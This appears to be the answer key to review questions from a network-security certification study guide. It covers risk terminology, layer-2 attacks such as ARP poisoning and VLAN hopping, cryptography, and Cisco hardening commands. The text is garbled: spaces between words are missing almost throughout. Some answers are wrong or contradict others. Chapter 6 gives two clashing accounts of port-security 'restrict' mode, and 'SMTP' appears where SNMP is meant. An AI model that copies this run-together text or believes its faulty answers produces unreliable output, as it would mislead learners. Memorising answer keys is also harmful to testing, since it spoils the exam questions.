Color MeaningRed SharedonlywithinameetingAmber SharedonlywiththoseintheorganizationwithaneedtoknowGreen SharedonlywithinacommunityWhite Norestrictionbutstillsubjecttocopyrightrules
8. C.SecurityContentAutomationProtocol(SCAP)isastandardusedbythesecurityautomationcommunityusedtoenumeratesoftwareflawsandconfigurationissues.It
standardizedthenomenclatureandformatsused.
9. B.Thesemetricgroupsaredescribedasfollows:
Base:Characteristicsofavulnerabilitythatareconstantovertimeanduserenvironments
Temporal:Characteristicsofavulnerabilitythatchangeovertimebutnotamonguserenvironments
Environmental:Characteristicsofavulnerabilitythatarerelevantanduniquetoaparticularuser’senvironment
10. D.TheSLEisthemonetaryimpactofeachthreatoccurrence.TodeterminetheSLE,youmustknowtheassetvalue(AV)andtheexposurefactor(EF).TheEFisthepercentvalueorfunctionalityofanassetthatwillbelostwhenathreateventoccurs.ThecalculationforobtainingtheSLEisasfollows:
SLE=AV×EF
11. B.Mitigationistheprocessofselectingacontrolthatwillreducetherisktoanacceptablelevel.
12. B.TheenterprisecampusincludestheenddevicesandprovidesthemwithaccesstotheoutsideworldandtotheIntranetdatacenterthroughtheenterprisecore.
13. B.Ademilitarizedzone(DMZ)isanareawhereyoucanplaceapublicserverforaccessbypeopleyoumightnottrustotherwise.ByisolatingaserverinaDMZ,youcanhideorremoveaccesstootherareasofyournetwork.
14. A.Networksecurityzonescanalsobecreatedatlayer2.Virtuallocalareanetworks(VLANs)arelogicalsubdivisionsofaswitchthatsegregateportsfromoneanotherasiftheywereindifferentLANs.
15. B.Integrity,thesecondpartoftheCIAtriad,ensuresthatdataisprotectedfromunauthorizedmodificationordatacorruption.Thegoalofintegrityistopreservetheconsistencyofdata,includingdatastoredinfiles,databases,systems,andnetworks.
16. B.Adefense-in-depthstrategyreferstothepracticeofusingmultiplelayersofsecuritybetweendataandtheresourcesonwhichitresidesandpossibleattackers.Thefirstlayerofagooddefense-in-depthstrategyisappropriateaccesscontrolstrategies.
17. A.Ariskistheprobabilitythatathreatagentwillexploitavulnerabilityandtheimpactifthethreatiscarriedout.Theriskinthevulnerabilityexamplewouldbefairlyhighifthedataresidinginthefolderisconfidential.However,ifthefoldercontainsonlypublicdata,thentheriskwouldbelow.
18. C.ThisclassificationsystemcreatedbytheUnitedKingdom’sNationalInfrastructureSecurityCoordinationCentre(NISCC,nowCentreforProtectionofNationalInfrastructure)andsinceadoptedbytheISO/IECaspartoftheStandardonInformationsecuritymanagementforintersectorandinterorganizationalcommunicationsandbyCERTistheTrafficLightProtocol(TLP).Thissystemusestrafficlightcolorstoclassify
informationassets.
19. B.CommonVulnerabilitiesandExposures(CVE)isacompilationofcommonvulnerabilitiesfoundinoperatingsystemsandapplications.
20. C.Theexposurefactor(EF)isthepercentvalueorfunctionalityofanassetthatwillbelostwhenathreateventoccurs.
Chapter2:UnderstandingSecurityThreats1. C.Hacktivistsincludethosewhohacknotforpersonalgainbuttofurtheracause.An
exampleistheAnonymousgroupthathacksfromtimetotimeforvariouspoliticalreasons.
2. A.IPaddressspoofingisoneofthetechniquesusedbyhackerstohidetheirtrailortomasqueradeasanothercomputer.ThehackeralterstheIPaddressasitappearsinthepacket.ThiscansometimesallowthepackettogetthroughanACLthatisbasedonIPaddresses.
3. C.Portscanningisnotapasswordattack.Bydeterminingtheservicesthatarerunningonasystem,theattackeralsodiscoverspotentialvulnerabilitiesoftheserviceofwhichtheattackermayattempttotakeadvantage.Thisistypicallydonewithaportscaninwhichall“open”or“listening”portsareidentified.
4. C.Whenthispacketissent,theseresponsesarepossible:
Noresponse:Theportisopenonthetarget.
RST:Theportisclosedonthetarget.
5. A.Withproperinputvalidation,abufferoverflowattackwillcauseanaccessviolation.Withoutproperinputvalidation,theallocatedspacewillbeexceeded,andthedataatthebottomofthememorystackwillbeoverwritten.Thekeytopreventingmanybufferoverflowattacksisinputvalidation,inwhichanyinputischeckedforformatandlengthbeforeitisused.
6. D.Aman-in-the-middleattackislaunchedfromasinglemaliciousindividual,whileDDoSattackscomefrommultipledevices.
7. A.Oneofthewaysaman-in-the-middleattackisaccomplishedisbypoisoningtheARPcacheonaswitch.TheattackeraccomplishesthispoisoningbyansweringARPrequestsforanothercomputer’sIPaddresswiththeattacker’sownMACaddress.OncetheARPcachehasbeensuccessfullypoisoned,whenARPresolutionoccurs,bothcomputerswillhavetheattacker’sMACaddresslistedastheMACaddressthatmapstotheothercomputer’sIPaddress.Asaresult,botharesendingtotheattacker,placingtheattacker“inthemiddle.”
8. B.DynamicARPinspection(DAI)isasecurityfeaturethatinterceptsallARPrequestsandresponsesandcompareseachresponse’sMACaddressandIPaddressinformationagainsttheMAC–IPbindingscontainedinatrustedbindingtable.ThistableisbuiltbyalsomonitoringallDHCPrequestsforIPaddressesandmaintainingthemappingofeachresultingIPaddresstoaMACaddress(whichispartofDHCPsnooping).Ifanincorrectmappingisattempted,theswitchrejectsthepacket.
9. C.ThemainpurposeofDHCPsnoopingistopreventapoisoningattackontheDHCPdatabase.Thisisnotaswitchattackperse,butoneofitsfeaturescansupportDAI.ItcreatesamappingofIPaddressestoMACaddressesfromatrustedDHCPserverthatcanbeusedinthevalidationprocessofDAI.
10. D.Avirusisanymalwarethatattachesitselftoanotherapplicationtoreplicateordistributeitself.
11. B.Intellectualpropertyispropertythatisconsideredtobeauniquecreationofthemindandincludesbooks,music,logos,inventions,andslogans.
12. C.ThebestmitigationforcreditdatatheftistoadoptallrecommendationsofthePaymentCardIndustryDataSecurityStandard(PCI-DSS).
13. B.MACaddressescanalsobespoofedandusedtogetthroughMACaddressfilters.Thesefiltersaretypicallyappliedtocontrolaccesstowirelessaccesspointsatlayer2.
14. A.ApossiblemitigationtechniqueistoimplementtheSenderPolicyFramework(SPF).SPFisanemailvalidationsystemthatworksbyusingDNStodeterminewhetheranemailsentbysomeonehasbeensentbyahostsanctionedbythatdomain’sadministrator.Ifitcan’tbevalidated,itisnotdeliveredtotherecipient’sbox.
15. B.Nmapisoneofthemostpopularportscanningtoolsusedtoday.Byperformingscanswithcertainflagssetinthescanpackets,securityanalysts(andhackers)canmakecertainassumptionsbasedontheresponsesreceived.
16. C.AnXMASscansetstheFIN,PSH,andURGflags.Whenthispacketissent,theseresponsesarepossible:
Noresponse:Theportisopenonthetarget.
RST:Theportisclosedonthetarget.
17. A.Theping-of-deathattackisoneinwhichanoversizedICMPpacketissenttothetarget.ThemaximumallowableIPpacketsizeis65,535bytes,includingthepacketheader,whichistypically20bytes.AnICMPechorequestisanIPpacketwithapseudoheader,whichis8bytes.Therefore,themaximumallowablesizeofthedataareaofanICMPechorequestis65,507bytes(65,535–20–8=65,507).
18. B.InareflectedDDoSattack,theattackisbouncedoffalargenumberofdeviceswithoutactuallyrecruitingthedevicesaszombies.AgoodexampleofthistypeofDDoSisthesmurfattack.
19. C.ThedynamicARPinspectionsecurityfeatureinterceptsallARPrequestsandresponsesandcompareseachresponse’sMACaddressandIPaddressinformationagainsttheMAC–IPbindingscontainedinatrustedbindingtable.ThispreventsARPpoisoningattacks.
20. B.Pharmingissimilartophishing,butpharmingactuallypollutesthecontentsofacomputer’sDNScachesothatrequeststoalegitimatesiteareactuallyroutedtoanalternatesite.
Chapter3:UnderstandingCryptography1. A.Asymmetrickeyalgorithmdoesnotuseapublickey.Itusesamatchingorprivatekey
forbothencryptionanddecryption.
2. B.Asymmetricalgorithmsarenottypicallyusedfordataatrestbecausetheyareveryslowinrelationtosymmetricalgorithmsatthistask.Asymmetricalgorithmsareusedfordataintransit.
3. D.Blockciphersemploybothsubstitutionandtransposition.
4. B.Stream-basedciphersperformencryptiononabit-by-bitbasisandusekeystreamgenerators.ThekeystreamgeneratorscreateabitstreamthatisXORedwiththeplaintextbits.TheresultofthisXORoperationistheciphertext.
5. A.Somemodesofsymmetrickeyalgorithmsuseinitializationvectors(IVs)toensurethatpatternsarenotproducedduringencryption.TheseIVsprovidethisservicebyusingrandomvalueswiththealgorithms.
6. B.AlthoughElectronicCodebook(ECB)istheeasiestandfastestmodetouse,ithassecurityissuesbecauseevery64-bitblockisencryptedwiththesamekey.Ifanattackerdiscoversthekey,alltheblocksofdatacanberead.
7. B.AESisthereplacementalgorithmfor3DESandDES.AlthoughAESisconsideredthestandard,thealgorithmthatisusedintheAESstandardistheRijndaelalgorithm.TheAESandRijndaeltermsareoftenusedinterchangeably.
8. A.RSAisthemostpopularasymmetricalgorithmandwasinventedbyRonRivest,AdiShamir,andLeonardAdleman.RSAcanprovidekeyexchange,encryption,anddigitalsignatures.ThestrengthoftheRSAalgorithmisthedifficultyoffindingtheprimefactorsofverylargenumbers.
9. C.Acollisionoccurswhenahashfunctionproducesthesamehashvalueondifferentmessages.
10. D.TheU.S.governmentrequirestheusageofSHA-2insteadofMD5.
11. B.AhashMAC(HMAC)isakeyed-hashMACthatinvolvesahashfunctionwithasymmetrickey.HMACcanhelpreducethecollisionrateofthehashfunction.
12. C.Adigitalsignatureisahashvalueencryptedwiththesender’sprivatekey.Adigitalsignatureprovidesauthentication,nonrepudiation,andintegrity.
13. A.Tousesymmetrickeyalgorithmsforencryptingdata,thetwopartiesmustshareanidenticalsymmetrickey.Thismeansweneedsomesecurewaytogetidenticalsymmetrickeysonthetwoendpoints.Thisisdonebyusingasymmetricalgorithmsforthekeyexchangeand,oncethekeysaregeneratedandexchanged,usingthesymmetrickeysandasymmetrickeyalgorithmfortheencryptionofthedata.Thisisoftencalledahybridcryptosystem.
14. A.Usersanddevicesareissuedpublic/privatekeypairsthatareboundtoadigitaldocumentcalledadigitalcertificate.Thiscertificate(morespecificallythekeystowhichitisbound)canbeusedforavarietyofthingsincluding:
Encryptingdata
Asaformofauthentication
Encryptingemail
Digitallysigningsoftware
15. B.AnX.509certificatecomplieswiththeX.509standard.
16. B.ACRLisalistofdigitalcertificatesthataCAhasrevoked.Tofindoutwhetheradigitalcertificatehasbeenrevoked,thebrowsermusteitherchecktheCRLorpushouttheCRLvaluestoclients.
17. A.VeriSignfirstintroducedthefollowingdigitalcertificateclasses:
Class1:Forindividualsintendedfore-mail.Thesecertificatesgetsavedbywebbrowsers.
Class2:Fororganizationsthatmustprovideproofofidentity.
Class3:ForserversandsoftwaresigninginwhichindependentverificationandidentityandauthoritycheckingisdonebytheissuingCA.
Class4:Foronlinebusinesstransactionsbetweencompanies.
Class5:Forprivateorganizationsorgovernmentalsecurity.
18. B.Anyparticipantthatrequestsacertificatemustfirstgothroughtheregistrationauthority(RA),whichverifiestherequestor’sidentityandregisterstherequestor.Aftertheidentityisverified,theRApassestherequesttotheCA.Inmanycases,theCAandtheRAarethesameserver.
19. B.Insomecases,twoorganizationsmayhaveaneedtotrustoneanother’scertificates.Thiscanbedonebyconfiguringcrosscertification.Incrosscertification,atrustiscreatedbetweenthetworootCAs,whichenablesbothsystemstotrustallcertificates.
20. B.TheASAhasaself-signeddefaultcertificatethatcanbeused,althoughinmostcasesitwillbedesirabletoinstallacertificatefromyourPKI.
Chapter4:SecuringtheRoutingProcess1. D.WhileconfiguringaloopbackIPaddresstobeusedformanagementaccessiscertainly
advisable,itisnotrequiredwhenconfiguringarouterforSSHaccess.
2. C.ThesyslogmessageindicatesthatSSHversion1.99hasbeenenabled.Thisindicatesthatitisaversion2serverthatcanacceptconnectionsfromSSHversion1devices.
3. D.Thelineintheconfigurationthatsaysloginlocalspecifiesthattheuseraccountswillbelocaltothisrouter.
4. A.Privilegelevelsallowyoutoassignatechniciansetsofactivitiesthatcoincidewiththelevelthetechnicianhasbeenassigned.Thereare16levels,from0to15.Whenyouareinusermode(router>),youareatprivilegelevel0.Whenyouareinprivilegedmode(router#),youareatlevel15.
5. C.IftheintentistoallowthistechniciantochangeIPaddressesoninterfaces,assignhimthatcommand.Sincetheipcommand(alongwiththeparameteraddress)isexecutedafterenteringinterfaceconfigurationmode,youhavetoreferenceinterfaceinthecommand,asshownhere:router(config)#privilegeinterfacelevel12ip
6. B.Theonlyviewthatexistsbydefaultiscalledroot,whichasyouwouldexpectallowsaccesstoallcommands.Accesstothisviewisprovidedwhenyousubmittheenablesecretpassword.
7. B.Toenabletheprotectionofthebootimage,issuethefollowingcommand:R64(config)#secureboot-image
*April214:24:50.231:%IOS_Reslience-5-IMAGE_RESIL_ACTIVE:Successfully
securedrunningimage
Noticethesystemmessageindicatingthebootimageisprotected.
8. B.Asecureconfigurationcanberemoved.Oncethesetwoitemsaresecured(calledthesecurebootset),youcannotupdatethestartupconfigurationwithoutremovingthesecureconfigurationlongenoughtomakethechangeandresecuringitaswasdoneinthefirstplace.
9. B.Commandsthatremoveasecurebootsetconfigurationcanberunonlyfromtheconsoleconnection.
10. B.OSPFroutingupdatesaresecuredusingahashingalgorithm.YoucanuseeitherMD5orSHA-256HMAC.Beaware,however,thatsomedevicesmaysupportonlyMD5.
11. C.Whilekeychainnamesandthekeynumbersdonothavetomatchonthetworoutersoneitherendofthelink,thekeystringsandthehashingalgorithmsmustmatch!
12. C.Thefinalstepistoapplythekeychaintotheinterfacethatconnectstotheneighboringrouter.
13. A.Keychainconfigurationmodeisthemodeinwhichyouwilldefinethekeynumberasfollows.ThenumberIamusingis1.R64(config-keychain)#key1
R64(config-keychain-key)#
14. A.Tellingtherouterthealgorithm(MD5)touseforthiskeyisdoneatthesamekeypromptasfollows:R64(config-keychain-key)#cryptographic-algorithmmd5
R64(config-keychain-key)#
15. A.ConfiguringEIGRProutingupdateauthenticationissimilartoOSPF.However,OSPFspecifiesthehashingalgorithmsinthesamemodewhereyouspecifythekeystring,butinEIGRP,thatisspecifiedontheinterface.
16. B.Whenyouspecifythealgorithm,youalsospecifytheEIGRPASnumberinthesamecommandasfollows,where66istheASnumber:R64(config-if)#upauthenticationmodeeigrp66md5
17. A.Therearefourtypesofpacketsthataroutermayencounter.Dataplanepacketsareend-station,user-generatedpacketsthatarealwaysforwardedbynetworkdevicestootherend-stationdevices.
18. B.Therearefourtypesofpacketsthataroutermayencounter.Controlplanepacketsarenetworkdevice–generatedorreceivedpacketsthatareusedforthecreationandoperationofthenetwork.ExamplesincludeprotocolssuchasARP,BGP,andOSPF.
19. C.Packetsinthecontrolplanearethosethatareeitherdestinedfortherouteritselforpacketsgeneratedbytherouter.
20. B.Inthismodel,threemechanismsareused.Classmapsareusedtocategorizetraffictypesintoclasses.ACLsaretypicallyusedtodefinethetraffic,andthentheACLisreferencedintheclassmap.Policymapsareusedtodefinetheactiontobetakenforaparticularclass.Actionsthatcanbespecifiedareallow,block,andrate-limit.Servicepoliciesareusedtospecifywherethepolicymapshouldbeimplemented.
Chapter5:UnderstandingLayer2Attacks1. C.Whenamaliciousindividualintroducesarogueswitchtotheswitchingnetworkandthe
rogueswitchhasasuperiorBPDUtotheoneheldbythecurrentrootbridge,thenewswitchassumesthepositionofrootbridge.
2. B.AnARPpoisoningattackisonethattakesadvantageofthenormalprocessthatdevicesusetolearnanunknownMACaddressthatadevicewithaknownIPaddresspossesses.ByusingagratuitousARP,theARPcacheofotherdevicescanbepoisoned.
3. A.InanARPpoisoningattack,theattackersendsapackettypecalledagratuitousARPtothetargetdevicewithanincorrectIPaddresstoMACaddressmapping.
4. C.FirstanareaofmemorycalledtheARPcacheisconsulted.IftheMACaddresshasbeenrecentlyresolved,themappingwillbeinthecache,andabroadcastisnotrequired.Iftherecordhasagedoutofthecache,ARPsendsabroadcastframetothelocalnetworkthatalldeviceswillreceive.
5. C.MACspoofingattacksoccurwhenanattackerchangeshisMACaddresssothatheappearstobeanotherdevice,andasisthecasewithallspoofingattacks,theultimateaimistoreceivesomethingintendedfortherealdeviceortogetpastaccesscontrolsbasedonaMACaddress.
6. A.AMACaddressattackisalsoconsideredaswitchattackbecauseitleveragestheMACaddresstableintheswitchtoaccomplishthegoalofreceivingtrafficdestinedforanotherdevice.
7. C.TheMACaddresstableisalsocalledthecontentaddressablememory(CAM)tableandispopulatedbytheswitchasframesareswitchedthroughit.
8. B.ThereisalimitedamountofmemoryspacethatisavailablefortheCAMtable.InaCAMoverflowattack,theattackerfloodstheswitchwithframesthathaveinvalidsourceMACaddresses.Thisiseasierthanitsoundsbyusingatoolsuchasmacof.
9. B.Theresultofthisattackisthattheattackerisnowabletoreceivetrafficthathewouldnothavebeenabletoseeotherwisebecauseinthisconditiontheswitchisbasicallyoperatingasahubandnotaswitch.
10. A.CiscoDiscoveryProtocol(CDP)anditsstandards-basedalternativeLinkLayerDiscoveryProtocol(LLDP)areusefultools.Theycanbeusedtodisplayinformationaboutdirectlyconnecteddevices.
11. C.TodisableCDPglobally,runthefollowingcommandinglobalconfigurationmode:Router67(config)#nocdprun
12. D.TodisableLLDPonaninterface,runthefollowingcommandininterfaceconfigurationmode:Router67(config-if)#nolldpreceive
13. B.AVLANhoppingattack’saimistoreceivetrafficfromaVLANofwhichthehacker’sportisnotamember.
14. A.AVLANhoppingattack’saimistoreceivetrafficfromaVLANofwhichthehacker’sportisnotamember.Itcanbedonetwoways:switchspoofinganddoubletagging.
15. C.SwitchportscanbesettouseaprotocolcalledDynamicTrunkingProtocol(DTP)tonegotiatetheformationofatrunklink.IfanaccessportisleftconfiguredtouseDTP,itispossibleforhackerstosettheirinterfacetospoofaswitchanduseDTPtocreateatrunklink.Ifthisoccurs,theycancapturetrafficfromallVLANs.
16. B.Doubletaggingisonlyanissueonswitchesthatuse“native”VLANs.AnativeVLANisusedforanytrafficthatisstillamemberofthedefaultVLAN,orVLAN1.
17. A.Whenconfiguredproperly,DHCPreducesadministrativeoverload,reducesthehumanerrorinherentinmanualassignment,andenhancesdevicemobility.Butitintroducesavulnerabilitythatwhenleveragedbyamaliciousindividualcanresultinaninabilityofhoststocommunicate(constitutingaDoSattack)andcanresultinpeer-to-peerattacks.
18. A.AfterreceivinganincorrectIPaddress,subnetmask,defaultgateway,andDNSserveraddressfromtherogueDHCPserver,theDHCPclientmightusetheattacker’sDNSservertoobtaintheIPaddressofhisbank.Thisleadshimtounwittinglyconnecttotheattacker’scopyofthebank’swebsite.Whenthecliententershiscredentialstologin,theattackernowhashisbankcredentialsandcanproceedtoemptyouthisaccount.
19. A.Trunkportsuseanencapsulationprotocolcalled802.1qtoplaceaVLANtagaroundeachframetoidentitytheVLANtowhichtheframebelongs.Whenaswitchattheendofatrunklinkreceivesan802.1qframe,itstripsthisoffandforwardsthetraffictothedestinationdevice.Inadoubletaggingattack,thehackercreatesaspecialframethathastwotags.TheinnertagistheVLANtowhichthehackerwantstosendaframe(perhapswithmaliciouscontent),andtheoutertagistherealVLANofwhichthehackerisamember.Iftheframegoesthroughtwoswitches(whichispossiblesinceVLANscanspanswitches),thefirsttaggetstakenoffbythefirstswitch,leavingthesecond,whichallowstheframetobeforwardedtothetargetVLANbythesecondswitch.
20. C.SwitchportscanbesettouseaprotocolcalledDynamicTrunkingProtocol(DTP)tonegotiatetheformationofatrunklink.IfanaccessportisleftconfiguredtouseDTP,itispossibleforhackerstosettheirinterfacetospoofaswitchanduseDTPtocreateatrunklink.Ifthisoccurs,theycancapturetrafficfromallVLANs.
Chapter6:PreventingLayer2Attacks1. C.ThisfeatureworksbyfilteringtheDHCPmessagessentbytherogueDHCPserverso
thattheyareneverreceivedbytheunsuspectinghosts.ItalsousesthemessagessenttoandfromthelegitimateDHCPservertobuildabindingdatabasethatmapstheMACaddressesofhoststotheIPaddressestheyreceivedfromthelegitimateDHCPserver.
2. D.Asamatteroffact,anyserverresponsepackets(DHCPOFFER,DHCPACK,orDHCPNACK)willbedroppedbytheseinterfaces.
3. B.TheDAIfeaturerequiresthatDHCPsnoopingalsobeenabledbecauseitdependsontheDHCPsnoopingdatabasethatiscreatedwhenDHCPsnoopingisenabled.
4. A.TheseinterfaceswillrequirethatyoucreateatypeofACLontheswitchcalledanARPACL.ThisACLidentifiesthecorrectIPtoMACaddressmappingfortheinterface,andtheACLisreferencedasafilterintheDAIconfiguration.ThismakestheACLavailabletotheDAIprocessasanadditiontotheDHCPsnoopingdatabase.
5. D.Youcanalsochoosethefollowingactionsusingalternativekeywordstotheshutdownkeyword:
protect:Theoffendingframewillbedropped.
restrict:Theframeisdropped,andanSNMPtrapandasyslogmessagearegenerated.
6. B.BylimitingthenumberofMACaddressesthatcanbeseenonaport,CAMoverflowattackscanbeprevented.
7. A.BPDUGuardshouldbeimplementedonlyonaccessportsbecauseifimplementedontrunks,itwouldinterferewiththenormaloperationofSTP,whichdependsontheseframesforitsoperation.
8. C.RootGuardpreventsthereceptionofsuperiorBPDUsonly,notallBPDUs.
9. B.ThisfeaturemakesadditionalchecksifBPDUsarenotreceivedonanondesignatedport.WithLoopGuardenabled,thatportmovesintotheSTPloop-inconsistentblockingstate,insteadofthelistening/learning/forwardingstate.
10. B.TodisableDTPonallports,usethefollowingcommand:SW71(config)#intfa0/1-24
SW71(config-if)#switchportnonegotiate
11. C.WiththeRestrictsetting,ifaviolationoccurs,thefa5/5interfacewillnotforwardtheoffendingtraffic,willnotsendanSNMPtraporsyslogmessage,andwillnotincrementtheviolationcounter,butwillstillpasslegitimatetraffic.
12. A.TheBPDUGuardfeatureisdesignedtopreventthereceptionofsuperiorBPDUsonaccessportsbypreventingthereceptionofanyBPDUframesontheaccessport.Bydoingso,itpreventstheintroductionofarogueswitch.
13. A.TheportwherethelegitimateDHCPserverresidesmustbemarkedastrustedsothatDHCPserverresponsesareallowedonthatport.
14. A.IfyouconfigureafileinflashmemoryfortheDHCPsnoopingdatabaseandtheswitchesreloadforsomereason,theywillretainthisdatabase.
15. B.Thedefaultstateisuntrusted.
16. C.WhiletheVLANnumberisusedinthenameoftheACL(StaticIP-VLAN3),thatisnotwhattiesittoVLAN.ItistheexplicitreferencetoVLAN3attheendofthecommandthatdoesit.
17. A.Beforetheothercommandsbecomeeffective,youmustenableportsecuritywiththeswitchportport-securitycommand.
18. D.WhileDAIcanpreventARPattacks,itcannotpreventSTPattacks.
19. C.Whenaviolationoccurs,theportwillbeplacedinanerr-disabledstateandwillnotpasstrafficuntilitisenabledagainmanually.
20. D.DTPshouldbedisabledonallports,bothtrunkandaccess.
Chapter7:VLANSecurity1. A.Inadoubletaggingattack,theattackercraftsapacketwithtwo802.1qtags,withthe
innertagsettotheVLANtowhichhewouldliketosendtraffic.ThisattacktakesadvantageofthenativeVLAN.Iftheattacker’saccessportissettothesameVLANasthenativeVLAN,thisattackbecomespossible.
2. D.ThesolutionistosetthenativeVLANnumbertooneinwhichnoneoftheaccessportsresides.Thisisdoneonlyonthetrunkports.TochangethenativeVLANofthetrunkportGi0/1to78,usethefollowingcommand:Switch79(config)#intgi0/1
Switch79(config-if)#switchporttrunknativevlan78
3. D.TherearemanychallengestoprovidingaseparateVLANpercustomer,butadecreaseinsecurityisnotoneofthem.
4. A.PrivateVLANsprovideseparationwithinaVLANatlayer2,whilestillleavingallmembersoftheoriginalVLAN(calledtheprimaryVLAN)inthesamesubnet.
5. A.TochangethenativeVLANofthetrunkportGi0/1to78,usethefollowingcommand:Switch79(config)#intgi0/1
Switch79(config-if)#switchporttrunknativevlan78
6. A.Promiscuousportscancommunicatewithaportofanyothertype.TypicalcandidatesforthisportassignmentarethoseportsleadingtotherouterorfirewallthatactasthedefaultgatewayfortheprimaryVLAN.
7. D.Whileagoodideatopreventdoubletaggingattacks,settingthenativeVLANnumbertooneinwhichnoneoftheaccessportsresidesisnotastepinsettingupPVLANs.
8. C.ToconfiguretheprimaryVLANas10,specifyingitasaprimaryPVLAN,usethefollowingcommands:Switch#configureterminal
Switch(config)#vlan10
Switch(config-vlan)#private-vlanprimary
9. A.TypicalcandidatesforthisportassignmentarethoseportsleadingtotherouterorfirewallthatactasthedefaultgatewayfortheprimaryVLAN.
10. C.ToassociateprivateVLANs501,502,and503withaprimaryVLAN10,usethefollowingcommands:Switch(config)#vlan10
Switch(config-vlan)#private-vlanassociation501-503
11. A.Thecommandswitchportmodeprivate-vlanhostmakestheportaPVLANport.
12. B.Thecommandswitchportprivate-vlanhost-association10202assignsa
porttoprimaryVLAN10andPVLAN202.
13. B.Insomecases,youmayfindthereisnoreasonforanycommunicationbetweenportsconnectedtothesameswitch.Whenthatisthecase,itmaybebeneficialtotakeadvantageofanotherfeaturecalledthePVLANEdgefeature.PreventingcommunicationsbetweenportswhenpossiblecanpreventattackssuchasARPpoisoningattacksandcanimpairtheabilityofahackertomovefromacompromisedhosttootherhosts.
14. C.Thecommandprivate-vlanassociation501executedundertheVLAN10configurationiswhattiesthePVLAN501totheprimaryVLAN10.
15. D.Forwardingbehaviorbetweenaprotectedportandunprotectedportsproceedsasusual.
16. B.WhenaporthasbeendesignatedasaPVLANEdgeport,itiscalledaprotectedport.
17. A.Tospecifyaportas“protected,”usethefollowingcommand:Switch(config)#interfacefa0/1
Switch(config-if-range)#switchportprotected
18. D.InaPVLANproxyattack,anattackersendsapacket(usingthepromiscuousport)withthesourceIPandMACaddressoftheattacker,adestinationIPaddressofthetarget,andtheMACaddressoftherouter.Whentherouterreceivesthepacket,therouterrewritesthedestinationMACaddresstothatofthetargetandsendsthepackettothetarget.ItisthepresenceoftheMACaddressoftherouterinthepacket,ratherthanthatofthetarget,thatcausesthistobepossible.
19. C.SincetherouterisbeingusedasthesourceMAC,therouterisconsidereda“proxy.”
20. D.TopreventPVLANproxyattacks,implementACLsontherouterinterfacethatdenytrafficfromthelocalsubnettothelocalsubnet.
Chapter8:SecuringManagementTraffic1. B.In-bandconnectiontypesincludeSNMP,virtualterminal(VTY),andHTTPS
connections.Out-of-bandconnectionsincludetheconsoleportandtheAUXport,bothphysicalconnectionsthatdonotusethenetworkasthetransmissionmedium.
2. A.TosetuptheAUXport,youneedtoknowthelinenumberusedbytheAUXport.Thiscanbedeterminedwiththeshowlinecommand.
3. C.WhenaloopbackaddressisconfiguredandusedasthemanagementIPaddress,anyphysicalinterfaceonthedevicecanaccepttheconnectionattemptiftheloopbackaddressisincludedindynamicroutingadvertisementsoradvertisedviaastaticroute.WhenmanagementaccessistiedtoaphysicalIPaddress,thedevicewillbeunreachablewhenthatphysicalinterfaceisdown.
4. B.BeforesettingapasswordontheVTYlines,youshoulddeterminehowmanyoftheselinesexistonthedevice(whichvaries)sothatyousecurethemall.UsethiscommandtolearnthenumberofVTYlines:R1(config)#linevty?
R1(c0nfig)#linevty<015>
5. B.TheselocationsandtheirassociateddataarecalledOIDs.TheOIDnumberdescribesthepaththroughthetree-likestructurewherethespecificpieceofinformationislocated.
6. B.Thesefunctionscanbeconfiguredusingthreemodes,whichrepresentvariouscombinationsofthesecapabilities:noAuthNoPriv,whichisnohashingtosecureauthenticationorencryptionofdata(referencedasnoauthinthecommand);AuthNoPriv,whichishashingtosecureauthenticationbutnoencryptionofdata(referencedasauthinthecommand);andAuthPriv,whichishashingtosecureauthenticationandencryptionofdata(referencedasprivinthecommand).
7. D.Allmanagementinterfacesshouldbeprotectedbypasswords.
8. C.TodisabletheHTTPserverandenabletheHTTPSserver,executethefollowingcommands:R81(config)#nohttpserver
R81(config)#iphttpssecure-server
9. D.Thecommandsyntaxisasfollowsandisexecutedattheglobalconfigurationprompt:
snmp-servergroupgroup-namev3securitypolicyaccess-typeview-nameaccess-listnumber
10. A.UseofwordssuchasWelcomemaybeusedlaterasadefensethataccesswasencouraged.
11. D.Therearethreetypesofbannermessages:messageoftheday,EXEC,andlogin.
12. A.MOTDmessagesappearatconnectiontimeandbeforetheloginbanner(ifconfigured).
13. C.ConfiguringSNMPrequiresyoutosetanengineIDforanydeviceusedtomanageSNMP.ThisisanIDnumbercomposedof24hexcharacters.Wheninformmessagesaresenttostations,itistheengineIDthatidentifiesthestation.
14. B.Assigningviewsisoptional.Intheabsenceofthis,userswillbeabletoviewtheentireMIB.
15. C.read-viewisthenameoftheviewthatiscreatedbythecommand,notthegroupname.
16. B.MD5willbeusedtocomputeahashvalueoftheupdatesenttotheclient.Theclientwillperformahashcalculationoftheupdateusingthesamesharedkeyandwillcomparetheresults.AmatchinresultsservesasassurancethattheupdatecamefromthelegitimateNTPserver.
17. A.ToconfigureNTPauthentication,thehigh-levelsteps(tobeperformedonboththeserverandclient)areconfiguringanNTPauthenticationkeynumberandMD5string(sharedsecret),specifyingatleastonetrustedkeynumberreferencingthekeynumberinthefirststep,andenablingNTPauthentication.
18. A.WhileFTPandTFTPcanbeusedtotransferconfigurationsandIOSimagesacrossthenetwork,theseprotocolslacktheabilitytoencryptthetransmission.AbetteralternativeistheSecureCopyProtocol(SCP).ThisanimplementationoftheRemoteCopyProtocol(RCP)thatoperatesoveranSSHconnection.
19. C.Withtheserversetupinplace,yousimplyreferencetheSCPserverbyputtingtheURLinthecopycommand.Forexample,iftheserverwerenamedscp-srvandyouwantedtocopytherunningconfigurationtoitunderthesecuritycontextofanaccountnamedAdminwithapasswordofmypass,whilenamingthefileR88-config.txt,youwouldusethefollowingcommand:R88#copyrunscp://scp-srv/admin:mypass/r88-config.txt
20. B.SMTPstoresthesettingsinaMIB.Thisisarepositorywithahierarchicalstructure,withstandardizedlocationsforeachpieceofconfigurationorstatusinformation.
Chapter9:Understanding802.1xandAAA1. A.The802.1xstandarddefinesaframeworkforcentralizedport-basedauthentication.It
canbeappliedtobothwirelessandwirednetworksandusesthesethreecomponents:
Supplicant:Theuserordevicerequestingaccesstothenetwork
Authenticator:Thedevicethroughwhichthesupplicantisattemptingtoaccessthenetwork
Authenticationserver:Thecentralizeddevicethatperformsauthentication
2. B.WhileTACACS+doesseparatethethreeAAAprocesses,itusesTCPratherthanUDP;itcreatesmoretrafficthanRADIUSandencryptstheentirebodyexcepttheTACACs+header.
3. B.Thecommandaaanew-modelenablesAAAservices.
4. C.Toconfigureanauthenticationmethodthatspecifieslocalauthenticationonalllines(byaddingthedefaultkeyword),usethiscommand:aaaauthenticationlogindefaultlocal
